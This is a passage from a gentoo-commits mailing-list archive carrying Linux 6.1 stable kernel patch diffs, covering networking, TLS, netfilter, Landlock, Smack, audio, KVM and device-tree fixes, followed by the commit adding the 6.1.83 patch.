++	hci_cmd_sync_cancel_sync(hdev, err);
+ }
+ 
+ /* Suspend HCI device */
+@@ -2858,7 +2858,7 @@ int hci_suspend_dev(struct hci_dev *hdev)
+ 		return 0;
+ 
+ 	/* Cancel potentially blocking sync operation before suspend */
+-	hci_cancel_cmd_sync(hdev, -EHOSTDOWN);
++	hci_cancel_cmd_sync(hdev, EHOSTDOWN);
+ 
+ 	hci_req_sync_lock(hdev);
+ 	ret = hci_suspend_sync(hdev);
+@@ -4169,7 +4169,7 @@ static void hci_send_cmd_sync(struct hci_dev *hdev, struct sk_buff *skb)
+ 
+ 	err = hci_send_frame(hdev, skb);
+ 	if (err < 0) {
+-		hci_cmd_sync_cancel_sync(hdev, err);
++		hci_cmd_sync_cancel_sync(hdev, -err);
+ 		return;
+ 	}
+ 
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 65b2ad34179f8..7e64cf880f9f1 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -678,7 +678,10 @@ void hci_cmd_sync_cancel_sync(struct hci_dev *hdev, int err)
+ 	bt_dev_dbg(hdev, "err 0x%2.2x", err);
+ 
+ 	if (hdev->req_status == HCI_REQ_PEND) {
+-		hdev->req_result = err;
++		/* req_result is __u32 so error must be positive to be properly
++		 * propagated.
++		 */
++		hdev->req_result = err < 0 ? -err : err;
+ 		hdev->req_status = HCI_REQ_CANCELED;
+ 
+ 		wake_up_interruptible(&hdev->req_wait_q);
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 6cf0b77839d1d..1e57027da2913 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -2075,15 +2075,14 @@ static int ieee80211_change_station(struct wiphy *wiphy,
+ 		}
+ 
+ 		if (sta->sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
+-		    sta->sdata->u.vlan.sta) {
+-			ieee80211_clear_fast_rx(sta);
++		    sta->sdata->u.vlan.sta)
+ 			RCU_INIT_POINTER(sta->sdata->u.vlan.sta, NULL);
+-		}
+ 
+ 		if (test_sta_flag(sta, WLAN_STA_AUTHORIZED))
+ 			ieee80211_vif_dec_num_mcast(sta->sdata);
+ 
+ 		sta->sdata = vlansdata;
++		ieee80211_check_fast_rx(sta);
+ 		ieee80211_check_fast_xmit(sta);
+ 
+ 		if (test_sta_flag(sta, WLAN_STA_AUTHORIZED)) {
+diff --git a/net/mac802154/llsec.c b/net/mac802154/llsec.c
+index 55550ead2ced8..a4cc9d077c59c 100644
+--- a/net/mac802154/llsec.c
++++ b/net/mac802154/llsec.c
+@@ -265,19 +265,27 @@ int mac802154_llsec_key_add(struct mac802154_llsec *sec,
+ 	return -ENOMEM;
+ }
+ 
++static void mac802154_llsec_key_del_rcu(struct rcu_head *rcu)
++{
++	struct ieee802154_llsec_key_entry *pos;
++	struct mac802154_llsec_key *mkey;
++
++	pos = container_of(rcu, struct ieee802154_llsec_key_entry, rcu);
++	mkey = container_of(pos->key, struct mac802154_llsec_key, key);
++
++	llsec_key_put(mkey);
++	kfree_sensitive(pos);
++}
++
+ int mac802154_llsec_key_del(struct mac802154_llsec *sec,
+ 			    const struct ieee802154_llsec_key_id *key)
+ {
+ 	struct ieee802154_llsec_key_entry *pos;
+ 
+ 	list_for_each_entry(pos, &sec->table.keys, list) {
+-		struct mac802154_llsec_key *mkey;
+-
+-		mkey = container_of(pos->key, struct mac802154_llsec_key, key);
+-
+ 		if (llsec_key_id_equal(&pos->id, key)) {
+ 			list_del_rcu(&pos->list);
+-			llsec_key_put(mkey);
++			call_rcu(&pos->rcu, mac802154_llsec_key_del_rcu);
+ 			return 0;
+ 		}
+ 	}
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 0a86c019a75de..2a5d9075a081d 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4711,6 +4711,12 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if ((flags & (NFT_SET_EVAL | NFT_SET_OBJECT)) ==
+ 			     (NFT_SET_EVAL | NFT_SET_OBJECT))
+ 			return -EOPNOTSUPP;
++		if ((flags & (NFT_SET_ANONYMOUS | NFT_SET_TIMEOUT | NFT_SET_EVAL)) ==
++			     (NFT_SET_ANONYMOUS | NFT_SET_TIMEOUT))
++			return -EOPNOTSUPP;
++		if ((flags & (NFT_SET_CONSTANT | NFT_SET_TIMEOUT)) ==
++			     (NFT_SET_CONSTANT | NFT_SET_TIMEOUT))
++			return -EOPNOTSUPP;
+ 	}
+ 
+ 	desc.dtype = 0;
+@@ -5132,6 +5138,7 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 
+ 	if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) {
+ 		list_del_rcu(&set->list);
++		set->dead = 1;
+ 		if (event)
+ 			nf_tables_set_notify(ctx, set, NFT_MSG_DELSET,
+ 					     GFP_KERNEL);
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 2bd27b77769cb..bdb5153f3788a 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -51,6 +51,7 @@ struct tls_decrypt_arg {
+ 	struct_group(inargs,
+ 	bool zc;
+ 	bool async;
++	bool async_done;
+ 	u8 tail;
+ 	);
+ 
+@@ -195,6 +196,17 @@ static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ 	struct sock *sk;
+ 	int aead_size;
+ 
++	/* If requests get too backlogged crypto API returns -EBUSY and calls
++	 * ->complete(-EINPROGRESS) immediately followed by ->complete(0)
++	 * to make waiting for backlog to flush with crypto_wait_req() easier.
++	 * First wait converts -EBUSY -> -EINPROGRESS, and the second one
++	 * -EINPROGRESS -> 0.
++	 * We have a single struct crypto_async_request per direction, this
++	 * scheme doesn't help us, so just ignore the first ->complete().
++	 */
++	if (err == -EINPROGRESS)
++		return;
++
+ 	aead_size = sizeof(*aead_req) + crypto_aead_reqsize(aead);
+ 	aead_size = ALIGN(aead_size, __alignof__(*dctx));
+ 	dctx = (void *)((u8 *)aead_req + aead_size);
+@@ -268,14 +280,18 @@ static int tls_do_decryption(struct sock *sk,
+ 	}
+ 
+ 	ret = crypto_aead_decrypt(aead_req);
+-	if (ret == -EINPROGRESS) {
+-		if (darg->async)
+-			return 0;
++	if (ret == -EINPROGRESS)
++		return 0;
+ 
+-		ret = crypto_wait_req(ret, &ctx->async_wait);
+-	} else if (darg->async) {
+-		atomic_dec(&ctx->decrypt_pending);
++	if (ret == -EBUSY) {
++		ret = tls_decrypt_async_wait(ctx);
++		darg->async_done = true;
++		/* all completions have run, we're not doing async anymore */
++		darg->async = false;
++		return ret;
+ 	}
++
++	atomic_dec(&ctx->decrypt_pending);
+ 	darg->async = false;
+ 
+ 	return ret;
+@@ -449,9 +466,11 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 	struct scatterlist *sge;
+ 	struct sk_msg *msg_en;
+ 	struct tls_rec *rec;
+-	bool ready = false;
+ 	struct sock *sk;
+ 
++	if (err == -EINPROGRESS) /* see the comment in tls_decrypt_done() */
++		return;
++
+ 	rec = container_of(aead_req, struct tls_rec, aead_req);
+ 	msg_en = &rec->msg_encrypted;
+ 
+@@ -486,19 +505,16 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 		/* If received record is at head of tx_list, schedule tx */
+ 		first_rec = list_first_entry(&ctx->tx_list,
+ 					     struct tls_rec, list);
+-		if (rec == first_rec)
+-			ready = true;
++		if (rec == first_rec) {
++			/* Schedule the transmission */
++			if (!test_and_set_bit(BIT_TX_SCHEDULED,
++					      &ctx->tx_bitmask))
++				schedule_delayed_work(&ctx->tx_work.work, 1);
++		}
+ 	}
+ 
+ 	if (atomic_dec_and_test(&ctx->encrypt_pending))
+ 		complete(&ctx->async_wait.completion);
+-
+-	if (!ready)
+-		return;
+-
+-	/* Schedule the transmission */
+-	if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
+-		schedule_delayed_work(&ctx->tx_work.work, 1);
+ }
+ 
+ static int tls_encrypt_async_wait(struct tls_sw_context_tx *ctx)
+@@ -560,6 +576,10 @@ static int tls_do_encryption(struct sock *sk,
+ 	atomic_inc(&ctx->encrypt_pending);
+ 
+ 	rc = crypto_aead_encrypt(aead_req);
++	if (rc == -EBUSY) {
++		rc = tls_encrypt_async_wait(ctx);
++		rc = rc ?: -EINPROGRESS;
++	}
+ 	if (!rc || rc != -EINPROGRESS) {
+ 		atomic_dec(&ctx->encrypt_pending);
+ 		sge->offset -= prot->prepend_size;
+@@ -1663,8 +1683,11 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 	/* Prepare and submit AEAD request */
+ 	err = tls_do_decryption(sk, sgin, sgout, dctx->iv,
+ 				data_len + prot->tail_size, aead_req, darg);
+-	if (err)
++	if (err) {
++		if (darg->async_done)
++			goto exit_free_skb;
+ 		goto exit_free_pages;
++	}
+ 
+ 	darg->skb = clear_skb ?: tls_strp_msg(ctx);
+ 	clear_skb = NULL;
+@@ -1676,6 +1699,9 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 		return err;
+ 	}
+ 
++	if (unlikely(darg->async_done))
++		return 0;
++
+ 	if (prot->tail_size)
+ 		darg->tail = dctx->tail;
+ 
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index d042ca01211fa..0cc4ed29e9015 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -1979,6 +1979,9 @@ static int copy_to_user_tmpl(struct xfrm_policy *xp, struct sk_buff *skb)
+ 	if (xp->xfrm_nr == 0)
+ 		return 0;
+ 
++	if (xp->xfrm_nr > XFRM_MAX_DEPTH)
++		return -ENOBUFS;
++
+ 	for (i = 0; i < xp->xfrm_nr; i++) {
+ 		struct xfrm_user_tmpl *up = &vec[i];
+ 		struct xfrm_tmpl *kp = &xp->xfrm_vec[i];
+diff --git a/scripts/Makefile.extrawarn b/scripts/Makefile.extrawarn
+index 6bbba36c59695..fa5ef41806882 100644
+--- a/scripts/Makefile.extrawarn
++++ b/scripts/Makefile.extrawarn
+@@ -65,6 +65,8 @@ KBUILD_CFLAGS += $(call cc-disable-warning, pointer-to-enum-cast)
+ KBUILD_CFLAGS += -Wno-tautological-constant-out-of-range-compare
+ KBUILD_CFLAGS += $(call cc-disable-warning, unaligned-access)
+ KBUILD_CFLAGS += $(call cc-disable-warning, cast-function-type-strict)
++KBUILD_CFLAGS += -Wno-enum-compare-conditional
++KBUILD_CFLAGS += -Wno-enum-enum-conversion
+ endif
+ 
+ endif
+diff --git a/security/landlock/syscalls.c b/security/landlock/syscalls.c
+index 2ca0ccbd905ae..d0cb3d0cbf985 100644
+--- a/security/landlock/syscalls.c
++++ b/security/landlock/syscalls.c
+@@ -32,6 +32,18 @@
+ #include "ruleset.h"
+ #include "setup.h"
+ 
++static bool is_initialized(void)
++{
++	if (likely(landlock_initialized))
++		return true;
++
++	pr_warn_once(
++		"Disabled but requested by user space. "
++		"You should enable Landlock at boot time: "
++		"https://docs.kernel.org/userspace-api/landlock.html#boot-time-configuration\n");
++	return false;
++}
++
+ /**
+  * copy_min_struct_from_user - Safe future-proof argument copying
+  *
+@@ -165,7 +177,7 @@ SYSCALL_DEFINE3(landlock_create_ruleset,
+ 	/* Build-time checks. */
+ 	build_check_abi();
+ 
+-	if (!landlock_initialized)
++	if (!is_initialized())
+ 		return -EOPNOTSUPP;
+ 
+ 	if (flags) {
+@@ -311,7 +323,7 @@ SYSCALL_DEFINE4(landlock_add_rule, const int, ruleset_fd,
+ 	struct landlock_ruleset *ruleset;
+ 	int res, err;
+ 
+-	if (!landlock_initialized)
++	if (!is_initialized())
+ 		return -EOPNOTSUPP;
+ 
+ 	/* No flag for now. */
+@@ -402,7 +414,7 @@ SYSCALL_DEFINE2(landlock_restrict_self, const int, ruleset_fd, const __u32,
+ 	struct landlock_cred_security *new_llcred;
+ 	int err;
+ 
+-	if (!landlock_initialized)
++	if (!is_initialized())
+ 		return -EOPNOTSUPP;
+ 
+ 	/*
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index fbadc61feedd1..feba69549d086 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -1309,7 +1309,8 @@ static int smack_inode_setxattr(struct user_namespace *mnt_userns,
+ 		check_star = 1;
+ 	} else if (strcmp(name, XATTR_NAME_SMACKTRANSMUTE) == 0) {
+ 		check_priv = 1;
+-		if (size != TRANS_TRUE_SIZE ||
++		if (!S_ISDIR(d_backing_inode(dentry)->i_mode) ||
++		    size != TRANS_TRUE_SIZE ||
+ 		    strncmp(value, TRANS_TRUE, TRANS_TRUE_SIZE) != 0)
+ 			rc = -EINVAL;
+ 	} else
+@@ -2782,6 +2783,15 @@ static int smack_inode_setsecurity(struct inode *inode, const char *name,
+ 	if (value == NULL || size > SMK_LONGLABEL || size == 0)
+ 		return -EINVAL;
+ 
++	if (strcmp(name, XATTR_SMACK_TRANSMUTE) == 0) {
++		if (!S_ISDIR(inode->i_mode) || size != TRANS_TRUE_SIZE ||
++		    strncmp(value, TRANS_TRUE, TRANS_TRUE_SIZE) != 0)
++			return -EINVAL;
++
++		nsp->smk_flags |= SMK_INODE_TRANSMUTE;
++		return 0;
++	}
++
+ 	skp = smk_import_entry(value, size);
+ 	if (IS_ERR(skp))
+ 		return PTR_ERR(skp);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 6e759032eba2e..fb12034d464ee 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9792,6 +9792,10 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c8a, "HP EliteBook 630", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c8c, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c90, "HP EliteBook 640", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c91, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c97, "HP ZBook", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca1, "HP ZBook Power", ALC236_FIXUP_HP_GPIO_LED),
+@@ -10750,6 +10754,8 @@ static const struct snd_hda_pin_quirk alc269_pin_fixup_tbl[] = {
+  *   at most one tbl is allowed to define for the same vendor and same codec
+  */
+ static const struct snd_hda_pin_quirk alc269_fallback_pin_fixup_tbl[] = {
++	SND_HDA_PIN_QUIRK(0x10ec0256, 0x1025, "Acer", ALC2XX_FIXUP_HEADSET_MIC,
++		{0x19, 0x40000000}),
+ 	SND_HDA_PIN_QUIRK(0x10ec0289, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
+ 		{0x19, 0x40000000},
+ 		{0x1b, 0x40000000}),
+@@ -11439,8 +11445,7 @@ static void alc897_hp_automute_hook(struct hda_codec *codec,
+ 
+ 	snd_hda_gen_hp_automute(codec, jack);
+ 	vref = spec->gen.hp_jack_present ? (PIN_HP | AC_PINCTL_VREF_100) : PIN_HP;
+-	snd_hda_codec_write(codec, 0x1b, 0, AC_VERB_SET_PIN_WIDGET_CONTROL,
+-			    vref);
++	snd_hda_set_pin_ctl(codec, 0x1b, vref);
+ }
+ 
+ static void alc897_fixup_lenovo_headset_mic(struct hda_codec *codec,
+@@ -11449,6 +11454,10 @@ static void alc897_fixup_lenovo_headset_mic(struct hda_codec *codec,
+ 	struct alc_spec *spec = codec->spec;
+ 	if (action == HDA_FIXUP_ACT_PRE_PROBE) {
+ 		spec->gen.hp_automute_hook = alc897_hp_automute_hook;
++		spec->no_shutup_pins = 1;
++	}
++	if (action == HDA_FIXUP_ACT_PROBE) {
++		snd_hda_set_pin_ctl_cache(codec, 0x1a, PIN_IN | AC_PINCTL_VREF_100);
+ 	}
+ }
+ 
+diff --git a/sound/sh/aica.c b/sound/sh/aica.c
+index 6e9d6bd67369a..8b47bfcd90318 100644
+--- a/sound/sh/aica.c
++++ b/sound/sh/aica.c
+@@ -278,7 +278,8 @@ static void run_spu_dma(struct work_struct *work)
+ 		dreamcastcard->clicks++;
+ 		if (unlikely(dreamcastcard->clicks >= AICA_PERIOD_NUMBER))
+ 			dreamcastcard->clicks %= AICA_PERIOD_NUMBER;
+-		mod_timer(&dreamcastcard->timer, jiffies + 1);
++		if (snd_pcm_running(dreamcastcard->substream))
++			mod_timer(&dreamcastcard->timer, jiffies + 1);
+ 	}
+ }
+ 
+@@ -290,6 +291,8 @@ static void aica_period_elapsed(struct timer_list *t)
+ 	/*timer function - so cannot sleep */
+ 	int play_period;
+ 	struct snd_pcm_runtime *runtime;
++	if (!snd_pcm_running(substream))
++		return;
+ 	runtime = substream->runtime;
+ 	dreamcastcard = substream->pcm->private_data;
+ 	/* Have we played out an additional period? */
+@@ -350,12 +353,19 @@ static int snd_aicapcm_pcm_open(struct snd_pcm_substream
+ 	return 0;
+ }
+ 
++static int snd_aicapcm_pcm_sync_stop(struct snd_pcm_substream *substream)
++{
++	struct snd_card_aica *dreamcastcard = substream->pcm->private_data;
++
++	del_timer_sync(&dreamcastcard->timer);
++	cancel_work_sync(&dreamcastcard->spu_dma_work);
++	return 0;
++}
++
+ static int snd_aicapcm_pcm_close(struct snd_pcm_substream
+ 				 *substream)
+ {
+ 	struct snd_card_aica *dreamcastcard = substream->pcm->private_data;
+-	flush_work(&(dreamcastcard->spu_dma_work));
+-	del_timer(&dreamcastcard->timer);
+ 	dreamcastcard->substream = NULL;
+ 	kfree(dreamcastcard->channel);
+ 	spu_disable();
+@@ -401,6 +411,7 @@ static const struct snd_pcm_ops snd_aicapcm_playback_ops = {
+ 	.prepare = snd_aicapcm_pcm_prepare,
+ 	.trigger = snd_aicapcm_pcm_trigger,
+ 	.pointer = snd_aicapcm_pcm_pointer,
++	.sync_stop = snd_aicapcm_pcm_sync_stop,
+ };
+ 
+ /* TO DO: set up to handle more than one pcm instance */
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index e0f406b6646ba..0568e64d10150 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -199,13 +199,6 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21HY"),
+ 		}
+ 	},
+-	{
+-		.driver_data = &acp6x_card,
+-		.matches = {
+-			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "21J2"),
+-		}
+-	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/tools/include/linux/btf_ids.h b/tools/include/linux/btf_ids.h
+index 72535f00572f6..72ea363d434db 100644
+--- a/tools/include/linux/btf_ids.h
++++ b/tools/include/linux/btf_ids.h
+@@ -3,6 +3,8 @@
+ #ifndef _LINUX_BTF_IDS_H
+ #define _LINUX_BTF_IDS_H
+ 
++#include <linux/types.h> /* for u32 */
++
+ struct btf_id_set {
+ 	u32 cnt;
+ 	u32 ids[];
+diff --git a/tools/testing/selftests/mqueue/setting b/tools/testing/selftests/mqueue/setting
+new file mode 100644
+index 0000000000000..a953c96aa16e1
+--- /dev/null
++++ b/tools/testing/selftests/mqueue/setting
+@@ -0,0 +1 @@
++timeout=180
+diff --git a/tools/testing/selftests/net/mptcp/diag.sh b/tools/testing/selftests/net/mptcp/diag.sh
+index 400cf1ce96e31..3df4a8103c76f 100755
+--- a/tools/testing/selftests/net/mptcp/diag.sh
++++ b/tools/testing/selftests/net/mptcp/diag.sh
+@@ -56,7 +56,7 @@ __chk_nr()
+ 			echo "[ skip ] Feature probably not supported"
+ 		else
+ 			echo "[ fail ] expected $expected found $nr"
+-			ret=$test_cnt
++			ret=${KSFT_FAIL}
+ 		fi
+ 	else
+ 		echo "[  ok  ]"
+@@ -100,10 +100,10 @@ wait_msk_nr()
+ 	printf "%-50s" "$msg"
+ 	if [ $i -ge $timeout ]; then
+ 		echo "[ fail ] timeout while expecting $expected max $max last $nr"
+-		ret=$test_cnt
++		ret=${KSFT_FAIL}
+ 	elif [ $nr != $expected ]; then
+ 		echo "[ fail ] expected $expected found $nr"
+-		ret=$test_cnt
++		ret=${KSFT_FAIL}
+ 	else
+ 		echo "[  ok  ]"
+ 	fi
+diff --git a/virt/kvm/async_pf.c b/virt/kvm/async_pf.c
+index 9bfe1d6f6529a..adaf6f141804f 100644
+--- a/virt/kvm/async_pf.c
++++ b/virt/kvm/async_pf.c
+@@ -88,7 +88,27 @@ static void async_pf_execute(struct work_struct *work)
+ 	__kvm_vcpu_wake_up(vcpu);
+ 
+ 	mmput(mm);
+-	kvm_put_kvm(vcpu->kvm);
++}
++
++static void kvm_flush_and_free_async_pf_work(struct kvm_async_pf *work)
++{
++	/*
++	 * The async #PF is "done", but KVM must wait for the work item itself,
++	 * i.e. async_pf_execute(), to run to completion.  If KVM is a module,
++	 * KVM must ensure *no* code owned by the KVM (the module) can be run
++	 * after the last call to module_put().  Note, flushing the work item
++	 * is always required when the item is taken off the completion queue.
++	 * E.g. even if the vCPU handles the item in the "normal" path, the VM
++	 * could be terminated before async_pf_execute() completes.
++	 *
++	 * Wake all events skip the queue and go straight done, i.e. don't
++	 * need to be flushed (but sanity check that the work wasn't queued).
++	 */
++	if (work->wakeup_all)
++		WARN_ON_ONCE(work->work.func);
++	else
++		flush_work(&work->work);
++	kmem_cache_free(async_pf_cache, work);
+ }
+ 
+ void kvm_clear_async_pf_completion_queue(struct kvm_vcpu *vcpu)
+@@ -115,7 +135,6 @@ void kvm_clear_async_pf_completion_queue(struct kvm_vcpu *vcpu)
+ #else
+ 		if (cancel_work_sync(&work->work)) {
+ 			mmput(work->mm);
+-			kvm_put_kvm(vcpu->kvm); /* == work->vcpu->kvm */
+ 			kmem_cache_free(async_pf_cache, work);
+ 		}
+ #endif
+@@ -127,7 +146,10 @@ void kvm_clear_async_pf_completion_queue(struct kvm_vcpu *vcpu)
+ 			list_first_entry(&vcpu->async_pf.done,
+ 					 typeof(*work), link);
+ 		list_del(&work->link);
+-		kmem_cache_free(async_pf_cache, work);
++
++		spin_unlock(&vcpu->async_pf.lock);
++		kvm_flush_and_free_async_pf_work(work);
++		spin_lock(&vcpu->async_pf.lock);
+ 	}
+ 	spin_unlock(&vcpu->async_pf.lock);
+ 
+@@ -152,7 +174,7 @@ void kvm_check_async_pf_completion(struct kvm_vcpu *vcpu)
+ 
+ 		list_del(&work->queue);
+ 		vcpu->async_pf.queued--;
+-		kmem_cache_free(async_pf_cache, work);
++		kvm_flush_and_free_async_pf_work(work);
+ 	}
+ }
+ 
+@@ -187,7 +209,6 @@ bool kvm_setup_async_pf(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa,
+ 	work->arch = *arch;
+ 	work->mm = current->mm;
+ 	mmget(work->mm);
+-	kvm_get_kvm(work->vcpu->kvm);
+ 
+ 	INIT_WORK(&work->work, async_pf_execute);
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-03-27 11:24 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-03-27 11:24 UTC (permalink / raw
  To: gentoo-commits

commit:     5b580758496b6fa2887fcd1af66242e779b0ccab
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 27 11:24:41 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Mar 27 11:24:41 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5b580758

Linux patch 6.1.83

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1082_linux-6.1.83.patch | 19133 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 19137 insertions(+)

diff --git a/0000_README b/0000_README
index db3a7674..3e406bb1 100644
--- a/0000_README
+++ b/0000_README
@@ -371,6 +371,10 @@ Patch:  1081_linux-6.1.82.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.82
 
+Patch:  1082_linux-6.1.83.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.83
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1082_linux-6.1.83.patch b/1082_linux-6.1.83.patch
new file mode 100644
index 00000000..328cd4b8
--- /dev/null
+++ b/1082_linux-6.1.83.patch
@@ -0,0 +1,19133 @@
+diff --git a/Makefile b/Makefile
+index c5345f3ebed0d..38657b3dda2cd 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 82
++SUBLEVEL = 83
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/arm-realview-pb1176.dts b/arch/arm/boot/dts/arm-realview-pb1176.dts
+index efed325af88d2..d99bac02232b3 100644
+--- a/arch/arm/boot/dts/arm-realview-pb1176.dts
++++ b/arch/arm/boot/dts/arm-realview-pb1176.dts
+@@ -451,7 +451,7 @@ pb1176_serial3: serial@1010f000 {
+ 
+ 		/* Direct-mapped development chip ROM */
+ 		pb1176_rom@10200000 {
+-			compatible = "direct-mapped";
++			compatible = "mtd-rom";
+ 			reg = <0x10200000 0x4000>;
+ 			bank-width = <1>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi b/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
+index aacbf317feea6..4b7aee8958923 100644
+--- a/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
++++ b/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
+@@ -106,8 +106,6 @@ &fec {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_enet>;
+ 	phy-mode = "rgmii-id";
+-	phy-reset-gpios = <&gpio1 25 GPIO_ACTIVE_LOW>;
+-	phy-reset-duration = <20>;
+ 	phy-supply = <&sw2_reg>;
+ 	status = "okay";
+ 
+@@ -120,17 +118,10 @@ mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
+-		phy_port2: phy@1 {
+-			reg = <1>;
+-		};
+-
+-		phy_port3: phy@2 {
+-			reg = <2>;
+-		};
+-
+ 		switch@10 {
+ 			compatible = "qca,qca8334";
+-			reg = <10>;
++			reg = <0x10>;
++			reset-gpios = <&gpio1 25 GPIO_ACTIVE_LOW>;
+ 
+ 			switch_ports: ports {
+ 				#address-cells = <1>;
+@@ -151,15 +142,30 @@ fixed-link {
+ 				eth2: port@2 {
+ 					reg = <2>;
+ 					label = "eth2";
++					phy-mode = "internal";
+ 					phy-handle = <&phy_port2>;
+ 				};
+ 
+ 				eth1: port@3 {
+ 					reg = <3>;
+ 					label = "eth1";
++					phy-mode = "internal";
+ 					phy-handle = <&phy_port3>;
+ 				};
+ 			};
++
++			mdio {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
++				phy_port2: ethernet-phy@1 {
++					reg = <1>;
++				};
++
++				phy_port3: ethernet-phy@2 {
++					reg = <2>;
++				};
++			};
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/qcom-msm8974.dtsi b/arch/arm/boot/dts/qcom-msm8974.dtsi
+index c4b2e9ac24940..5ea45e486ed54 100644
+--- a/arch/arm/boot/dts/qcom-msm8974.dtsi
++++ b/arch/arm/boot/dts/qcom-msm8974.dtsi
+@@ -1134,7 +1134,7 @@ restart@fc4ab000 {
+ 
+ 		qfprom: qfprom@fc4bc000 {
+ 			compatible = "qcom,msm8974-qfprom", "qcom,qfprom";
+-			reg = <0xfc4bc000 0x1000>;
++			reg = <0xfc4bc000 0x2100>;
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			tsens_calib: calib@d0 {
+diff --git a/arch/arm/boot/dts/r8a73a4-ape6evm.dts b/arch/arm/boot/dts/r8a73a4-ape6evm.dts
+index e81a7213d3047..4282bafbb5043 100644
+--- a/arch/arm/boot/dts/r8a73a4-ape6evm.dts
++++ b/arch/arm/boot/dts/r8a73a4-ape6evm.dts
+@@ -209,6 +209,18 @@ &cmt1 {
+ 	status = "okay";
+ };
+ 
++&extal1_clk {
++	clock-frequency = <26000000>;
++};
++
++&extal2_clk {
++	clock-frequency = <48000000>;
++};
++
++&extalr_clk {
++	clock-frequency = <32768>;
++};
++
+ &pfc {
